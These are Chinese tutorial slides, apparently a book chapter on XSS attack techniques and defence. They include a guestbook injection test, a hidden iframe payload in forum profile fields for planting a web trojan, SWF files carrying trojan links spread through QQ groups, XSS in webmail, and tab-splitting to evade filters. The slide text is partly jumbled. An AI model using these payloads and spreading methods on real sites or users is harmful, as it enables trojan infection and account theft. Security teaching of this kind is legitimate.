XSS跨站脚本攻击技术与防范
合集下载
相关主题
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
Flash溢出跨站攻击 Flash溢出跨站攻击
具体的操作步骤如下: 步骤3:先将刚才生成的SWF木马文件上传到某个空间中,再打开某个QQ群的论坛栏目 ,单击【发帖】按钮,即可新建新帖。在新帖页面中单击【插入Flash】按钮,在 弹出对话框中输入SWF木马文件的网络链接地址并设置其尺寸大小,单击【插入】 按钮,即可插入Flash文件,如图6-40所示。发表新帖子之后,当有人在QQ群中打 开查看这篇帖子时,就会自动播放Flash并在后台下载运行木马服务端了。当然, 也可以直接在QQ群中散布SWF木马文件的网址,别人单击后一样会中木马,不过这 种方式不如发表帖子隐蔽的效果好,攻击的持续性也不强。
XSS攻击案例模拟 XSS攻击案例模拟
1 2 3 4 盗用用户权限攻击案例模拟 XSS挂马攻击案例模拟 XSS提权攻击案例模拟 XSS钓鱼攻击分析
XSS挂马攻击案例模拟 XSS挂马攻击案例模拟
具体的操作步骤如下: 步骤1:打开动网论坛,如图6-73所示。若还没有在该论坛中注册一个用户,则单 击【注册】按钮,即可打开【新用户注册】窗口进行注册。如果已经是注册用 户,则单击【登录】按钮进行登录,成功登录后的界面如图6-74所示。 步骤2:在该页面中选择【用户控制面板】→【联系资料修改】菜单项,即可打开 个人资料修改页面,如图6-75所示。
简单留言本的跨站漏洞
具体的操作步骤如下: 步骤3:再来测试向数据库里插入JavaSc ript能否被解析执行。进入发表留言页面, 在其中输入“<script>alert('测试漏洞');</script>”代码,如图6-17所示。由 于昵称和留言这两个选项里都存在漏洞,所以JavaScript代码可放在其中任意一 项中。 步骤4:单击【提交】按钮,再访问index.asp页面,将会发现跟预想的一样,果然弹 出了【Microsoft Internet Explorer】对话框,提示相应的测试信息,如图6-18 所示。
邮箱跨站攻击
1 邮箱跨站攻击Hale Waihona Puke Baidu
1.QQ邮箱跨站传播木马很迅速 2.QQ邮箱挂马漏洞测试 3.QQ邮箱跨站导致QQ盗号攻击
2 国内主流邮箱跨站漏洞
国内主流邮箱跨站漏洞 国内主流邮箱跨站漏洞
对163邮箱进行跨站的操作步骤如下: 步骤1:登录163免费邮箱,在“收件人”栏中填入要攻击的邮箱地址,主题可以任 意填写,单击下方编辑窗口中的【全部功能】按钮展开全部功能项,从功能栏 中单击【编辑源码】按钮 ,进入HTML代码编写状态,在其中输入如下测试代码 ,如图6-51所示。 步骤2:在输入完成后,单击【发送】按钮,即可发送邮件。当用户接收并查看邮 件时,就会自动弹出百度的网页窗口了,如图6-52所示。
1 2 XSS的分类与危害 常见XSS代码分析
一个典型的跨站漏洞攻击实例
1 2 简单留言本的跨站漏 跨站漏洞的利用洞
简单留言本的跨站漏洞
具体的操作步骤如下: 步骤1:试试插入HTML代码查看是否能够执行,这里输入一个简单的HTML超链接标签 “<a>”试试,如图6-15所示。单击【提交】按钮,输入的数据就被插入到数据库 里了。 步骤2:访问index.asp主页面,查看代码在页面中是否会执行成功,如图6-16所示。 其中显示的“aaa”和“bbb”都附有超链接,说明写进去的HTML代码从数据库中 读出后被解析执行了。既然能解析执行HTML代码,也就说明该页面有漏洞了。
本章结束,谢谢观赏
XSS挂马攻击案例模拟 XSS挂马攻击案例模拟
具体的操作步骤如下: 步骤5:在设置完毕后,单击【更新】按钮,即可提交修改资料内容。如果提交成 功,则会看到“你修改的信息已成功提交”提示信息,如图6-77所示。 步骤6:返回论坛,回复或新发一篇帖子,帖子内容可随意填写。发表成功后再查 看新发的帖子,即可看到在新发的帖子页面中已经嵌入了一个网页框架,在框 架中显示了“新起点工作室”的页面,如图6-78示。
反黑风暴— 黑风暴— 网站入侵与脚本技术快速防杀 网站入侵与脚本技术快速防杀
XSS跨站脚本攻击技术与防范 XSS跨站脚本攻击技术与防范
♂XSS产生根源和触发条件 ♂一个典型的跨站漏洞攻击实例 ♂从Q-Zone看跨站攻击技术 ♂邮箱跨站攻击 ♂XSS攻击案例模拟
XSS产生根源和触发条件 XSS产生根源和触发条件
从Q-Zone看跨站攻击技术的演变 Zone看跨站攻击技术的演变
1 2 3 4 不安全的客户端过滤 自定义模块跨站攻击 Flash跳转的跨站攻击 Flash溢出跨站攻击
Flash溢出跨站攻击 Flash溢出跨站攻击
具体的操作步骤如下: 步骤1:打开Icode To SWF工具,单击“SWF文件”后面的【选择】按钮,选择本机上 某个正常的Flash文件;在“插入代码”栏中填写刚才的网页木马的链接地址。 步骤2:单击【给我插】按钮,即可将网页木马链接插入到正常的Flash文件中了,如 图6-39所示。SWF插马工具生成的Flash文件是利用了一个IE漏洞,对方打开Flash 文件后,就会造成IE溢出,自动访问木马网页在后台下载运行网页中的木马程序 。
XSS挂马攻击案例模拟 XSS挂马攻击案例模拟
具体的操作步骤如下: 步骤3:在“论坛密码”栏中输入论坛密码,在“主页地址”文本框中输入代码 “<Script> <Iframe height=0 width=0 sRc=”http//网页木马地址”></ Iframe >”。使用这种方式挂的网页木马,由于网页框架是隐藏的,所以不容 易被发现。这里为了显示挂马的效果,不对网站造成危害,因此将网页框架扩 大,并用其他网址代替网页木马地址,使用的代码为<Script>< Iframe height=500 width=500 sRc=“http//newtop01.com”>< Iframe ></Script>。 步骤4:还需要在“MSN号码”文本框中输入相应代码“<Script Language=JavaScript> var actioninfo3='单帖屏蔽'”,如图6-76所示。
专家课堂(常见问题与解答) 专家课堂(常见问题与解答)
点拨1 点拨1:为什么在使用“getURL("http://www.***.com ");”语句时,没有输入后面的 分号“;”就提示语法错误? 解答: 解答:Actions acript 的每行语句都以分号“;”结束,它不同于BASIC语言, Actions cript 语句同C++、Java、Pascal一样允许分多行书写,即允许将一条很 的长语句分割成两个或更多代码行,只要在结尾有个分号就行了。 点拨2 点拨2:为什么有些代码中将一些关键字符使用一个空格分隔开了(如javascript)? 解答:在某些代码中使用空格将部分关键字符分隔开,这些空格是使用Tab键产生的, 解答: 是为了逃脱过滤机制,从而顺利进行攻击。